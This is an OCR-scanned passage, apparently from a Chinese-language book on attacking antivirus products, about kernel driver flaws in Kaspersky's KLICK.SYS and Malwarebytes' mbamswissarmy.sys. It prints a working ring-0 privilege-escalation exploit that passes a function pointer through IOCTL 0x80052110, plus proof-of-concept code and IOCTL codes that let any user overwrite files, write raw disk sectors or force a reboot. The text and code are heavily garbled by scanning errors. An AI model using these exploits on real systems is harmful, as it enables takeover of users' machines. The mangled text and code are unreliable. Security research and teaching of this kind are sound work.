E svchost.exe 238K 5195K — 732 Host Process f 
E evchostese. <00 14676K 1493K 780 Host Process a 
[E psksvc.ere <00 1812K 316K — 900 Anlimalware p "e 
日 回 TPSw exe 45908K 32K — 944 TPSiv Applice T 
WebProw ene 30976K 272K 1244 Intemet reside Dil Name: [Critools\dlslopen_ cri Detugiopen cmd 
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Eee ee 
图 14-6 ”成 功 获取 了 Panda 反 病毒 的 权限 











DLL 被 成 功 注 人 程序 的 进程 空间 ， 并 以 SYSTEM 权 限 执 行 。 在 证 明了 该 方法 可 行 后 ， 我 
们 可 以 借助 NtcreateThread 方 法 来 注入 DLL 文件 ,编写 更 复杂 的 漏洞 利用 攻击 程序 。 比 如 ， 
Metasploit meterpreter 库 可 以 实现 让 受害 机 器 远程 连接 到 我 们 控制 并 运行 着 Metasploit 控 制 端 
的 机 器 上 。 这 只 是 一 个 简单 的 例子 ， 事 实 上， 成功 注入 DLL 文件 后 ， 我 们 可 以 做 任何 想 做 的 


事情 。 
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上 一 节 已 经 探讨 了 一 些 由 隐藏 功能 产生 的 漏洞 。 类 似 在 Panda Global Protection 中 使 用 秘 
密 UUID 和 IOCTL 代 码 禁 用 防护 的 做 法 ， 在 反 病毒 产品 中 十 分 常见 。 有 一 些 反 病毒 产品 是 为 了 
提供 给 技术 支持 人 员 使 用 ( 如 前 所 述 ); 还 有 一 些 有 着 其 他 原因 ， 正 如 我 们 下 面 要 讨论 的 漏洞 
一 样 。 

2006 年 ， 安 全 研究 者 Ruben Santamarta 报 告 了 存在 于 卡巴 斯 基 互 联网 安全 软件 6.0 中 的 一 个 有 
趣 漏洞 。 该 版 本 的 卡巴 斯 基 工 具 借助 两 个 驱动 来 做 系统 的 NDIS 和 TDI hook。 用 于 hook 这 类 系统 
的 驱动 分 别 是 KLICK.SYS 和 KLIN .SYS。 两 个 驱动 都 实现 了 一 个 插件 系统 ， 以 安装 其 他 模块 的 回 
调 。 每 个 插件 的 注册 都 通过 内 部 IOCTL 代 码 实 现 。KLICK .SYS 驱 动 ( 用 来 hook NDIS 系 统 ) 注册 
的 设备 驱动 的 ACL 没 有 约束 力 ， 因 此 任何 用 户 都 可 以 对 设备 \\. \KLICK DOS 进 行 写 操作 ， 反 过 
来 ,任意 用 户 也 都 可 以 利用 该 内 核 驱 动 的 隐藏 功能 ,IOCTL 代 码 0x80052110 代 表 , 从 KLICK .SYS 
驱动 的 插件 注册 一 个 回调 。 让 我 们 来 看 看 驱动 的 DriverEntry 方 法 : 






































.text:00010A3D ; NTSTATUS _ cdecl DriverEntry (PDRIVER OBJECT DriverObject, 
PUNICODE STRING RegistryPath) 

.text:00010A3D public DriverEntry 

.text:00010A3D DriverEntry proc near 

.text:00010A3D 

.text:00010A3D SourceString- word ptr -800h 
.text:00010A3D var 30- UNICODE STRING ptr -30h 
.text:00010A3D var 28- byte ptr -28h 

.text:00010A3D AnsiString- STRING ptr -1Ch 

.text:00010A3D DestinationString- UNICODE STRING ptr -14h 
.text:00010A3D SymbolicLinkName- UNICODE STRING ptr -0Ch 
.text:00010A3D ResultLength- dword ptr -4 
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.text:00010A3D DriverObject- dword ptr 8 
.text:00010A3D RegistryPath- dword ptr  0Ch 
.text:00010A3D 
.text:00010A3D push ebp 
.text:00010A3E mov ebp, esp 
.text:00010A40 sub esp, 800h 
.text:00010A46 push ebx 
.text:00010A47 push esi 
.text:00010A48 mov esi, ds:RtlInitUnicodeString 
.text:00010AA4E push edi 
.text:00010AA4F lea eax, [ebp«DestinationString] 
.text:00010A52 push offset SourceString ; MDeviceNklick 
.text:00010A57 push eax ; DestinationString 
.text:00010A58 call esi ; RtlInitUnicodeString 
.text:00010A5A lea eax, [ebp-«SymbolicLinkName] 
.text:00010A5D push offset aDosdevicesKlic ; MDosDevicesNklick 
.text:00010A62 push eax ; DestinationString 
.text:00010A63 call esi ; RtlInitUnicodeString 
.text:00010A65 mov ebx, [ebp-«DriverObject] 
.text:00010A68 zor esi, esi 
.text:00010A6A push offset DeviceObject ; DeviceObject 
.text:00010A6F push esi ; Exclusive 
.text:00010A70 push esi ; DeviceCharacteristics 
.text:00010A71 lea eax, [ebp«DestinationString] 
.text:00010A74 push 22h ; DeviceType 
.text:00010A76 push eax ; DeviceName 
.text:00010A77 push esi ; DeviceExtensionSize 
.text:00010A78 push ebx 
.text:00010A79 call uninteresting 10888 
.text:00010A7E push eax ; DriverObject 
.text:00010A7F call ds:IoCreateDevice 


该 方法 首先 创建 设备 驱动 \Device\Klick， 以 及 机 器 对 应 的 符号 连接 名 称 \DosDevices 


\klicko È £, KX device_handler H9 Hb Hk 4E 4 t 


Function: 





B a) r XX 2H Driverobject->Major- 


[ebx+_DRIVER_OBJECT.MajorFunction] 


.text:00010A97 lea edi, 
.text:00010A9A pop ecx 
.text:00010A9B mov eax, offset device handler 


; 


.text:00010AA0 rep stosd 





Copy the device handler to the MajorFunction table 


函数 aevice_handler 就 是 我 们 想 要 分 析 来 确定 哪个 IOCTL 被 处 理 ， 又 是 如 何 被 处 理 的 。 如 


果 我 们 跟 进 该 函数 ， 会 看 到 类 似 如 下 伪 代 码 : 


NTSTATUS __stdcall device handler( 
PDEVICE OBJECT dev obj, struct  IRP *Irp) 


NTSTATUS err; // ebpel 
IO STACK LOCATION *CurrentStackLocation; 


unsigned int InputBufferLength; // edx@1 
unsigned int maybe write length; // ediG1 
unsigned int io control code; // ebx81 


// eaxQe1 
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UCHAR irp func; // alel 


err - 0; 
CurrentStackLocation - 
( IO STACK LOCATION *)Irp-»Tail.Overlay 
.CurrentStackLocation; 
InputBufferLength - 
CurrentStackLocation-»Parameters.DeviceloControl 
.InputBufferLength; 





maybe write length - CurrentStackLocation-»Parameters.Write 
.Length; 


io, control, code = 
CurrentStackLocation-»Parameters.DeviceloControl 
.IoControlCode; 





irp func = CurrentStackLocation-»MajorFunction; 
if ( irp func == IRP MJ DEVICE CONTROL || 
irp func -- IRP MJ INTERNAL DEVICE CONTROL ) 
err - internal device handler( 

io, control code, 
Irp-»-AssociatedIrp.SystemBuffer, 
InputBufferLength, 
Irp-»-AssociatedIrp.SystemBuffer, 
maybe write length, 
&Irp-»IoStatus.Information); 


Irp-»1IoStatus.anonymous 0.Status = err; 
IofCompleteRequest(Irp, 0); 
return err; 


} 

如 你 所 见 ， 该 函数 接受 发 送 到 IOCTL 和 Iocontrolcode 的 传 入 参数， 然后 将 其 传递 给 男 一 
个 被 我 称 为 jnternal_gdevice_handler 的 函数 。 在 该 函数 中 , 根据 IOCTL 代 码 不 同 , 其 最 终 调 
用 了 男 一 个 函数 sup_1172A: 











001170C loc_1170C: ; CODE XREF: internal device handler-«1Ej 

001170C ; internal, device handler«25j 
001170C push [ebp«-iostatus info] ; iostatus, info 

001170F push [ebp-write length] ; write length 

0011712 push [ebp«system buf write] ; SystemBufferWrite 

0011715 push [ebp«-input buf length] ; InputBufferLength 

0011718 push [ebp«SystemBuffer] ; SystemBuffer 

001171B push eax ; a2 

001171C call sub 1172A 


在 sub_1172A 函 数 中 ， 可 以 很 清楚 地 发 现 其 中 的 漏洞 。 如 果 我 们 使 用 Hex-Ray 反 汇编 工具 
获取 该 函数 的 伪 代 码 , 然后 查看 处 理 IOCTL 代 码 0x80052110 部 分 的 伪 代 码 , 会 发 现 如 下 奇特 的 
部 分 : 


(aca) 
if ( io control code == 0x80052110 ) 
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{ 
if ( SystemBuffer && InputBufferLength >= 8 ) 
{ 
v10 = (void *)(*(int (— cdecl **)( DWORD))(*this + 20))(0); 
if ( v10 ) 
( 
(*(void (_ thiscall **)(void *))(*( DWORD *)v10 + 4)) (v10); 


if ( sub 15306(v10, 
*(int ( cdecl **)(char *, char *, int))SystemBuffer, 
*(( DWORD *)SystemBuffer + 1)) ) 
CET 


注意 反 汇 编 软件 显示 的 强制 转换 成 函数 指针 的 地 方 。 反 汇编 软件 显示 在 systemBuffer 处 的 
元 素 ， 直 接 被 用 做 了 函数 指针 。 换 句 话 来 说 ， 在 被 发 送 到 IOCTL 处 理 右 的 缓冲 区 中 ， 第 一 个 
DWORD 处 被 发 送 的 指针 是 一 个 函数 指针 ， 有 可 能 会 在 某 处 被 用 来 调用 一 些 东 西 。 函 数 
sub_15306 包 含 如 下 代码 : 


s int . thiscall sub. 153061 
; void *this, 











; int (cdecl *system buffer)(char *, char *, int), 
1 int a3) 

text:00015306 sub 15306 proc near 

text:00015306 var 20- byte ptr -20h 


p 
:00015306 var. 18- byte p 
:00015306 var 10- byte ptr -10h 
:00015306 var 8- dword p 

p 


:00015306 var 4- dword ptr -4 














text:00015306 system buffer- dword ptr 8 
text:00015306 arg 4- dword ptr  0Ch 
text:00015306 

text:00015306 push ebp 

text:00015307 mov ebp, esp 
.text:00015309 sub esp, 20h 

(PS 

text:00015316 mov ecx, [ebp-«arg 4] 
text:00015319 lea edi, [esi-«10h] 
text:0001531C mov [esi«1ECh], ecx 
text:00015322 push ecx 

text:00015323 lea ecx, [esi+1B8h] 
text:00015329 mov [esi-1F0h], eax 
.text:0001532F mov [edi], eax 
.text:00015331 mov eax, [ebprsystem buffer] 


; Pointer to the SystemBuffer 











.text:00015334 push ecx 

.text:00015335 push edi 

.text:00015336 mov [esi«1ACh], eax 

.text:0001533C call eax ; Call *(DWORD *)SystemBuffer!!!! 





驱动 会 调用 通过 IOCTIL 传 递 的 缓冲 区 中 的 第 一 个 DWORD 中 的 任意 地 址 ， 这 就 意味 着 任何 人 
都 可 以 在 Ring0 执 行 任意 代码 。 产 生 该 漏洞 的 本 质 原因 是 设计 缺陷 ( 或 者 是 因为 错误 的 权限 控 
制 )。 该 函数 会 被 驱动 KLICK.SYS 的 插件 使 用 ， 来 注册 插件 和 回调 : 
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人 


.七 ext :0001535D push edi 
.text:0001535E push ecx 
.text:0001535F push offset aRegisterPlugin 


; "Register plugin: ID = «£x» <%s>\r\n" 
:00015364 push 3 

:00015366 push 8 

:00015368 push eax 

.text:00015369 call dword ptr [edx+0Ch] 


但 是 ，ACL 的 驱动 允许 任何 人 以 插件 身份 调用 IOCTL 代 码 。 这 就 意味 着 , 任何 人 都 可 以 通过 
一 个 没有 特权 的 进程 ， 在 内 核 态 直接 执行 任意 代码 。 

比如 , 考虑 利用 驱动 的 漏洞 调用 一 个 用 户 态 函数 指针 , 编写 针对 该 漏洞 的 利用 程序 就 十 分 容 
易 了 。 下 面 是 Ruben 针 对 本 漏洞 编写 的 利用 攻击 程序 : 


LA AAAA NA VUNA N LUAU UUAN VAANII 
///// ANP (Kaspersky) 

ERES SEES IA AAVA AAAA ALAA E LAA 
//// FOR EDUCATIONAL PURPOSES ONLY 
//// Kernel Privilege Escalation #2 
//// Exploit 

//// Rubén Santamarta 

//// www.reversemode.com 

//// 01/09/2006 

A 
//1/11/11/1/1111/1/1/111/1/1/1/1111/1/1/1/111/1/1/1111 


.Cex 
.Cex 
.Cex 











CF cb ch c 











dinclude «windows.h» 
#include <stdio.h> 


void RingOFunction() 


( 
printf("----[RINGO]----An"); 
printf("Hello From Ring0!WMn"); 
printf("----[RINGO]----|nMn") ; 
exit (1); 

} 


VOID ShowError() 
( 
LPVOID lpMsgBuf; 
FormatMessage(FORMAT MESSAGE ALLOCATE BUFFER| 
FORMAT MESSAGE FROM SYSTEM, 





NULL $ 

GetLastError (), 

MAKELANGID (LANG_NEUTRAL, SUBLANG_DEFAULT), 

(LPTSTR) &lpMsgBuf, 

0, 

NULL); 
MessageBoxA(0, (LPTSTR)l1pMsgBuf,"Error",0); 
exit(1); 
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int main(int argc, char *argv[]) 


( 


DWORD InBuff[1]; 
DWORD  dwIOCTL,OutSize,InSize,junk; 
HANDLE hDevice; 


system("cls"); 

printf("ftibribsdgitsttttttttthtiihidsin"); 

printf("## AVP Ring0 Exploit ##\n"); 
printf("Wibsibsdsittittittitbitbihbihidhin"); 

printf("Ruben SantamartaMnwww.reversemode.comWMnWMn"); 


[1] hDevice = CreateFile("NNNN.NNKLICK", 
0, 
0, 
NULL, 
3, 
0, 
0); 


PLANLA LALLANA LANLA ANA 


///// INFO 
他 

if (hDevice == INVALID HANDLE VALUE) ShowError(); 
printf("[!] KLICK Device Handle [$x]WMn",hDevice); 


I/1111111111111111111/ 

///// BUFFERS 

VL EE ALL 

[2] InSize - 0x8; 

[3] InBuff[0] = (DNWORD) Ring0Function; // Ring0 ShellCode Address 


IM lE TP TAIATA IA 
///// IOCTL 
LIMLlllldTdIHd4dIldMMdHdMd 
dwIOCTL = 0x80052110; 


printf("[!] IOCTL [0x$x]MnWMn",dwIOCTL); 
[4] DeviceloControl (hDevice, 
dwIOCTL, 


InBuff,0x8, 
(LPVOID) NULL, 0, 


&junk, 
NULL); 
return 0; 


) 

上 述 代码 中 最 有 意思 的 部 分 已 经 使 用 粗 体 标 出 。 在 标记 [1] 处 , 首先 打开 了 由 驱动 KLICK.SYS 
创建 的 设备 驱动 的 符号 链接 (NN. N KLICK )。 接 着 ,在 [2] 处 ,将 传人 缓冲 区 的 预期 大 小 设置 为 8 
字 节 。 在 [3] 处 ,将 要 发 送 到 IocontrolCcode 人 处理 句柄 处 的 传人 缓冲 区 的 第 一 个 DWORD, 设置 
成 本 地 函数 RingoFunction 的 地 址 。 最 后 , 在 [4] 处 使 用 DeviceIocontrol API 调 用 了 存在 漏洞 
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BJIOCTLAVRS., fed JE HRiIngOoFunctionPAZk, ERN "Hello from 
Ring0" 的 信息 。 我 们 可 以 根据 自己 的 需要 随意 更 改 payload。 比如 , 可 以 使 用 payload 弹 出 一 个 CMD 
shell 或 创建 一 个 管理 员 用 户 ， 等 等 。 这 是 因为 我 们 这 里 的 payload 是 运行 在 内 核 态 下 的 。 


14.4 更 多 的 内 核 远 辑 漏洞 


和 之 前 卡巴 斯 基 的 案例 一 样 , 反 病毒 软件 中 的 一 些 内 核 漏洞 是 由 于 错误 地 允许 用 户 发 送 命 令 
(IOCTL ) 导致 的 。 事 实 上 该 问题 不 仅仅 影响 了 卡巴 斯 基 ， 还 有 大 量 的 反 病毒 软件 同样 存在 此 类 
问题 。 本 节 将 会 展示 另 一 个 例子 : 在 Malwarebytes 中 存在 的 一 组 零 日 内 核 漏 洞 。 一 篇 名 为 “Angler 
Exploit Kit Gives Up on Malwarebytes Users” 的 博文 中 提 到 ， 如 果 Malwarebytes 反 病毒 软件 有 以 下 
错误 表述 ， 那 么 Angler Exploit Kit 将 无 法 进行 操作 。 


我 们 几乎 可 以 想象 出 , 网 络 罪犯 在 发 现 他 们 耗 尽 了 能 用 于 躲避 检测 的 二 进 
制 技巧 储备 而 开发 出 来 的 新 玩意 儿 已 经 被 Malwarebytes 检 测 到 时 ， 抱 她 连篇 的 
画面 了 。 即 便 他 们 自 以 为 能 用 一 个 零 日 漏洞 攻 其 不 备 ， 但 Malwarebytes 也 能 人 
全 部 予以 拦截 。 


本 书 探讨 了 反 病 毒 软件 如 何 成 为 真实 的 攻击 目标 。 同样 地 , 反 病 毒 软件 又 要 如 何 阻止 针对 其 
自身 的 零 日 漏洞 攻击 呢 ? 答案 很 简单 : 它 无 法 阻止 。 另 外 , 反 病 毒 软件 甚至 不 会 尝试 去 防御 对 其 
自身 进行 的 零 日 漏洞 攻击 。 为 了 证 明 反 病毒 软件 抱 有 的 错误 观点 , 下 面 的 例子 试 着 利用 一 个 简单 
的 漏洞 对 其 进行 攻击 。Malwarebytes 是 一 款 较 新 的 反 病 毒 软 件 ， 使 用 了 一 系列 内 核 驱 动 ; 其 中 有 
一 个 名 为 mbamswissarmy.sys 的 驱动 创建 了 一 个 任意 本 地 用 户 都 可 以 与 其 进行 通信 的 设备 The 
Malwarebytes’ Swiss Army Knife。 这 个 命名 似乎 揭示 了 该 驱动 导出 了 有 趣 的 函数 ， 所 以 让 我 们 在 
IDA 中 将 其 打开 。 初 始 化 自动 分 析 结 束 后 ， 可 以 在 人 口 点 看 到 以 下 反 汇 编 结 
























































INIT:0002D1DA ; NTSTATUS _ stdcall DriverEntry (PDRIVER OBJECT DriverObject, 
PUNICODE STRING RegistryPath) 

INIT:0002D1DA public DriverEntry 
INIT:0002D1DA DriverEntry proc near 
INIT:0002D1DA 

INIT:0002D1DA DriverObject = dword ptr 8 
INIT:0002D1DA RegistryPath = dword ptr 0Ch 
INIT:0002D1DA 

INIT:0002D1DA mov edi, edi 
INIT:0002D1DC push ebp 
INIT:0002D1DD mov ebp, esp 
INIT:0002D1DF call sub 2D1A1 
INIT:0002D1E4 pop ebp 
INIT:0002D1E5 jmp driver entry 
INIT:0002D1E5 DriverEntry endp 








sub_2D1A1 KM0 TE E4RCookie, 我们 可 以 略 过 这 里 直接 跳 转 至 driver_entry。 在 经 过 一 
些 枯燥 的 分 析 后 ,我们 可 以 看 到 与 创建 用 于 与 驱动 交互 的 设备 对 象 相关 的 代码 : 


INIT:0002D03E mov edi, ds: imp RtlInitUnicodeString 
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INIT:0002D044 push offset aDeviceMbamswis; SourceString 
INIT:0002D049 lea eax, [ebp«DestinationString] 
INIT:0002D04C push eax ; DestinationString 
INIT:0002D04D call edi ; | imp RtlInitUnicodeString 
INIT:0002D04F push offset aDosdevicesMb 0 ; SourceString 
INIT:0002D054 lea eax, [ebp-«SymbolicLinkName] 

INIT:0002D057 push eax ; DestinationString 
INIT:0002D058 call edi ; | imp RtlInitUnicodeString 
INIT:0002D05A lea eax, [ebp«DriverObject] 

INIT:0002D05D push eax ; DeviceObject 
INIT:0002D05E xor edi, edi 

INIT:0002D060 push edi ; Exclusive 
INIT:0002D061 push 100h ; DeviceCharacteristics 
INIT:0002D066 push 22h ; DeviceType 
INIT:0002D068 lea eax, [ebp«DestinationString] 
INIT:0002D06B push eax ; DeviceName 
INIT:0002D06C push edi ; DeviceExtensionSize 
INIT:0002D06D push esi ; DriverObject 
INIT:0002D06E call ds:IoCreateDevice 


在 aDeviceMbamswis 或 aDosdevicesMb_0 名 上 双击 ， 我 们 会 看 到 其 创建 的 完整 设备 名 称 : 


INIT:0002D2CE ; const WCHAR aDosdevicesMb_0 
INIT:0002D2CE aDosdevicesMb 0: 

INIT:0002D2CE unicode 0, «MDosDevicesMMBAMSwissArmy»,0 
INIT:0002D302 ; const WCHAR aDeviceMbamswis 
INIT:0002D302 aDeviceMbamswis: 

INIT:0002D302 unicode 0, «MDeviceMMBAMSwissArmy»,0 


按 下 ESC 键 ， 回 到 正在 分 析 的 函数 ， 并 继续 进行 分 析 。 创 建设 备 对 象 之 后 的 指令 ， 执 行 了 如 
下 代码 : 








INIT:0002D08E mov eax, [esi-« DRIVER OBJECT.MajorFunction] 
INIT:0002D091 mov g MajorFunction, eax 
INIT:0002D096 mov eax, offset device create close 
INIT:0002D09B mov [esi«- DRIVER OBJECT.MajorFunction], eax 
INIT:0002D09E mov [esi-( DRIVER OBJECT.MajorFunction-8)], eax 
INIT:0002D0A1 lea eax, [ebp«DestinationString] 
INIT:0002D0AA4 push eax ; DeviceName 
INIT:0002D0A5 lea eax, [ebp-«SymbolicLinkName] 
INIT:0002D0A8 push eax ; SymbolicLinkName 
INIT:0002D0A9 mov [esi-( DRIVER OBJECT.MajorFunction-38h)], 
offset DispatchDeviceControl 
INIT:0002DO0BO mov [esi+( DRIVER OBJECT.MajorFunction-40h)], 
offset device cleanup 
INIT:0002D0B7 mov [esi+ DRIVER OBJECT.DriverUnload], 
offset driver unload 
INIT:0002DOBE call ds:IoCreateSymbolicLink 


似乎 其 正在 注册 处 理 函 数 的 设备 驱动 。 按 下 F5 来 查看 该 部 分 代码 的 伪 代 码 : 


DriverObject-»MajorFunction[IRP MJ CREATE] = 
(PDRIVER DISPATCH)device create close; 
DriverObject-»MajorFunction[IRP MJ CLOSE] = 
(PDRIVER DISPATCH)device create close; 
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DriverObject-»MajorFunction[IRP MJ DEVICE CONTROL] = 
(PDRIVER DISPATCH)DispatchDeviceControl; 











DriverObject-»MajorFunction[IRP. MJ SHUTDOWN] = 
(PDRIVER  DISPATCH)device cleanup; 

DriverObject-»DriverUnload = (PDRIVER UNLOAD)driver unload; 

ERRE ERREA ERI PET RETA, KOLARA, KSNR, n BEN 
是 , 设备 控制 了 被 我 重 命名 为 DispatchDevicecontrol 的 处 理 器 。 该 函数 用 于 处 理 用 户 态 模块 
向 驱动 发 送 过 来 的 OCTL 命 令 : 

PAGE:0002C11E mov eax, [ebp-«Irp] ; IRP-»Tail. 
Overlay.CurrentStackLocation 
PAGE:0002C121 push ebx 
PAGE:0002C122 push esi 
PAGE:0002C123 push edi 
PAGE:0002C124 mov edi, [eax-«60h] 
PAGE:0002C127 mov eax, 
[edi-« IO STACK LOCATION.Parameters.DeviceloControl.InputBufferLength] 
PAGE:0002C12A xor ebx, ebx 
PAGE:0002C12C push ebx ; Timeout 
PAGE:0002C12D push ebx ; Alertable 
PAGE:0002C12E push ebx ; WaitMode 
PAGE:0002C12F push ebx ; WaitReason 
PAGE:0002C130 mov esi, offset Mutex 
PAGE:0002C135 push esi ; Object 
PAGE:0002C136 mov [ebp«-CurrentStackLocation], edi 
PAGE:0002C139 mov [ebp«-input buf length], eax 
PAGE:0002C13C call ds:KeWaitForSingleObject 
PAGE:0002C142 mov edi, 
[edi-« IO STACK LOCATION.Parameters.DeviceloControl.IoControlCode] 
PAGE:0002C145 cmp edi, 22241Dh 
PAGE:0002C14B jz lóc 2C34C 
PAGE:0002C151 cmp edi, 222421h 
PAGE:0002C157 jz loc 2C34C 
PAGE:0002C15D cmp edi, 222431h 
PAGE:0002C163 jz loc. 2C34C 
PAGE:0002C169 cmp edi, 222455h 
PAGE:0002C16F jz loc, 2C34C 
PAGE:0002C175 cmp edi, 222425h 
PAGE:0002C17B jz loc 2C34C 
PAGE:0002C181 cmp edi, 22242Dh 
PAGE:0002C187 jz loc 2C34C 
PAGE:0002C18D cmp edi, 222435h 
PAGE:0002C193 jz loc 2C34C 
PAGE:0002C199 cmp edi, 222439h 
PAGE:0002C19F jz loc 3034€ 
PAGE:0002C1A5 cmp edi, 22245Eh 
PAGE:0002C1AB jz loc 2C34C 
PAGE:0002C1B1 cmp edi, 222469h 
PAGE:0002C1B7 jz loc, 2C34C 








函数 在 EAX 中 存储 配 分 的 用 户 态 缓冲 区 大 小 ， 检 查 存 储 在 EDI 中 的 IOCTL 代 码 ， 并 发 送 给 驱 
动 。 有 一 些 IOCTL 代 码 在 此 处 人 处理。 让 我 们 跟 进 1oc_2c34c 处 的 条 件 跳 转 : 
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PAGE:0002C34C loc_2C34C: ; CODE XREF: DispatchDeviceControl+35j 
PAGE:0002C34C 

; DispatchDeviceControl-«41j " 

PAGE:0002C34C mov edi, [ebp-«Irp] 


PAGE:0002C34F 
PAGE:0002C34F loc 2C34F: ; CODE XREF: DispatchDeviceControl«1D4j 


PAGE:0002C34F 
; DispatchDeviceControl«1DBj ... 
PAGE:0002C34F mov eax, [ebp«CurrentStackLocation] 








PAGE:0002C352 

PAGE:0002C352 loc, 2C352: ; CODE XREF: DispatchDeviceControl-«1307j 
PAGE:0002C352 ; DispatchDeviceControl-«13Cj 

PAGE:0002C352 mov ecx, 

[eaxe IO STACK LOCATION.Parameters.DeviceloControl.IoControlCode] 
PAGE:0002C355 add ecx, OFFDDDBFEh ; switch 104 cases 

PAGE:0002C35B cmp ecx, 67h 

PAGE:0002C35E ja loc. 2C5A9 ; jumptable 0002C36B default case 
PAGE:0002C364 movzx ecx, ds:byte 2C62E[ecx] 

PAGE:0002C36B jmp ds:off 2C5CE[ecx*4] ; switch jump 

上 述 列表 中 粗 体 的 部 分 是 用 于 决定 在 IOCTL 代 码 中 哪些 代码 需要 被 执行 的 switch 列 表 。 让 我 

















们 切换 到 伪 代 码 识 图 窗口 ， 这 样 可 以 更 容易 地 了 解 清楚 其 相关 行为 操作 。 下 面 就 是 该 switch 的 伪 
代码 ， 其 中 有 趣 的 IOCTL 代 码 以 粗 体 标 出 : 


switch ( io stack location-»Parameters.DeviceloControl.IoControlCode ) 
t 
case MB HandleloctlEnumerate: 
v12 = HandleIloctlEnumerate(Irp, io stack location, (int)buf); 
goto FREE POOL AND RELEASE MUTEX; 
case MB HandleloctlEnumerateADS: 
v12 - HandleloctlEnumerateADS(Irp, io stack location, 
(wchar r *)burf): 
goto FREE POOL AND RELEASE MUTEX; 
case MB HandleIoctlOverwriteFile: 
v12 = HandleIoctlOverwriteFile(Irp, io stack location, 
(wchar t *)buf); 
goto FREE POOL AND RELEASE MUTEX; 
case MB HandleIoctlReadFile: 
v12 = HandleIloctlReadFile(Irp, io stack location, buf); 
goto FREE POOL AND RELEASE MUTEX; 
case MB HandleIloctlBreakFile: 
v15 = HandleIloctlBreakFile(Irp, io stack location, (PCWSTR)buf); 
goto LABEL 41; 
case MB HandleloCreateFile FileDeleteChild: 
v12 = HandleIoCreateFile(Irp, 
(int)io stack location, (wchar t *)buf, FILE DELETE CHILD); 
goto FREE POOL AND RELEASE MUTEX; 
case MB HandleIloCreateFile FileDirectoryFile: 
v12 = HandleIoCreateFile(Irp, (int)io stack location, (wchar t *)buf, 
FILE DIRECTORY FILE); 
goto FREE POOL AND RELEASE MUTEX; 
case MB HandleloctlReadWritePhysicalSectorl: 
v12 = HandleIloctlReadWritePhysicalSector(Irp, 
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(int)io stack location, (int)buf, 1); 
goto FREE POOL AND RELEASE MUTEX; 
case MB HandleIoctlReadWritePhysicalSector2: 
v12 = HandleIoctlReadWritePhysicalSector(Irp, 
(int)io stack location, (int)buf, 0); 
goto FREE POOL AND RELEASE MUTEX; 








E 


case MB HalRebootRoutine: 
HalReturnToFirmware (HalRebootRoutine); 
return result; 


(...) 
根据 函数 名 和 IOCTL 代 码 , 我 们 可 以 确定 , 此 处 向 用 户 态 导出 了 很 多 不 应 该 导出 给 所 有 用 户 
态 进程 使 用 的 功能 。 下 面 是 对 上 述 伪 代 码 中 粗 体 部 分 IOCTL 代 码 的 解释 : 


























O MB HandleloctlOverwriteFile 人 允许 任意 用 户 态 进程 重 写 任意 文件 ; 

O MB_HandleIoctlReadFile 人 允许 任意 用 户 态 进程 读 取 任意 文件 ; 

O MB_HandleIoCreateFile_FileDeleteChild 删除 任意 文件 和 /或 目录 ; 

D MB_HandleIoctlReadWritePhysicalSector1/2 从 / 问 人 磁盘 读 或 写 物 理 扇 区 ; 

D MB HalRebootRoutine 在 内 核 态 下 执行 HalReturnToFirmwareHalRebootRoutine 


重启 机 器 。 

这 就 意味 着 攻击 者 可 以 通过 利用 Malwarebytes 驱 动 提供 的 功能 ,在 任意 层面 上 控制 目标 机 了 器。 
正 是 由 于 防护 软件 中 存在 这 个 漏洞 , 无 论 攻击 程序 在 本 地 拥有 什么 权限 , 攻击 者 都 可 以 在 任意 位 
置 创建 文件 覆盖 任意 想 要 履 盖 的 文件 ,甚至 是 在 目标 机 器 上 安装 一 个 可 以 直接 物理 写 和 人 的 磁盘 。 
从 安全 角度 来 讲 , 这 无 疑 是 一 个 巨大 的 灾难 : 原本 应 该 用 于 保护 用 户 免 受 恶 意 攻 击 者 侵害 的 反 病 
毒 软件 ， 事实 上 却 暴 露 了 可 以 被 任意 用 户 利用 来 控制 机 器 的 内 核 态 相关 功能 。 

我 编写 的 下 列 Poc 证 明了 我 对 该 驱动 缺陷 的 理解 是 正确 的 。PoC 没 有 显示 任何 提示 用 户 机 器 
要 重启 的 对 话 框 ， 直 接 在 内 核 层 面 重启 了 机 器 。 下 面 是 文件 main.cpp 的 代码 : 


dinclude "mb swiss.h" 
























































void usage(const char *prog name) 
{ 
printf( 
"Usage: %s\n" 
"--reboot Forcefully reboot the machine.n" 
"y Show version information about the driver.\n", prog_name); 





int main(int argc, char **argv) 
{ 


CMBSwiss swiss; 
if ( swiss.open device() ) 
{ 


printf("[+] Device successfully opened\n"); 
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for ( int i = 1; i < argc; i++ ) 
( 
if ( strcmp(argv[i], "--reboot") == 0 ) 
( 
printf("[«] Bye, bye!!!"); 
Sleep(2000); 
swiss.reboot(); 
printf("[!] Something went wrong :/Nn"); 
j 
else if ( strcmp(argv[i], "-v") -- 0 ) 
( 
char ver[24]; 
if ( swiss.get version(ver, sizeof(ver)) ) 
printf("[-«] MBAMSwissArmy driver version %s\n", ver); 
else 
printf("[!] Error getting MBAMSwissArmy driver version :(n"); 
} 
else 
( 
usage (argv[0]); 
} 
} 
j 
return 0; 
} 
上 述 代码 只 处 理 两 条 命令 ; -reboot 重启 机 器 ，-v 显 示 了 驱动 版 本 。 创 建 类 型 为 cBswiss 


的 对 象 ,然后 依照 相关 命令 调用 repboot 或 get_version。 现在 让 我 们 来 瞧 


文件 : 


#ifndef MB SWISS H 
ddefine MB SWISS H 


#include 


#include 
#include 
#include 
#include 
#include 


<string> 


<wchar . h> 
<stdio.h> 


enum MB SWISS ARMY 


«tlhelp32. 
«winternl. 





Ins 


«windows.h» 


h> 
h> 


IOCTLS_T 





{ 


MB_HandleIoctlEnumerate 
MB_HandleIoctlEnumerateADS 
MB_HandleIoctlOverwriteFile 
MB_HandleIoctlReadFile 
MB_HandleIoctlBreakFile 
MB_HandleIoCreateFile_FileDeleteChild 


0x222402, 

0x22245A, 
0x22242A, 

0x222406, 
0x222408, 


0x22240C, 


一 瞧 mb_swiss.h 头 部 
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B HandleIloCreateFile FileDirectoryFile = 0x222410, 
B HandleloctlReadWritePhysicalSectorl = 0x222416, 
B HandleloctlReadWritePhysicalSector2 - 0x222419, 
B 0x222435u - 0x222435, 

B 0x222439u - 0x222439, 

B 0x22241Du - 0x22241D, 

B do free dword 2A548 = 0x222421, 

B 0x222431u - 0x222431, 

B DetectKernelHooks - 0x222455, 

B HandlelIoctlReadMemoryImage = 0x222452, 

B 0x222442u = 0x222442, 

B 0x222446u = 0x222446, 

B 0x22244Au = 0x22244A, 

B RegisterShutdownNotification - 0x22244E, 

B HalRebootRoutine - 0x222425, 

B ReBuildVolumesData - 0x22242D, 

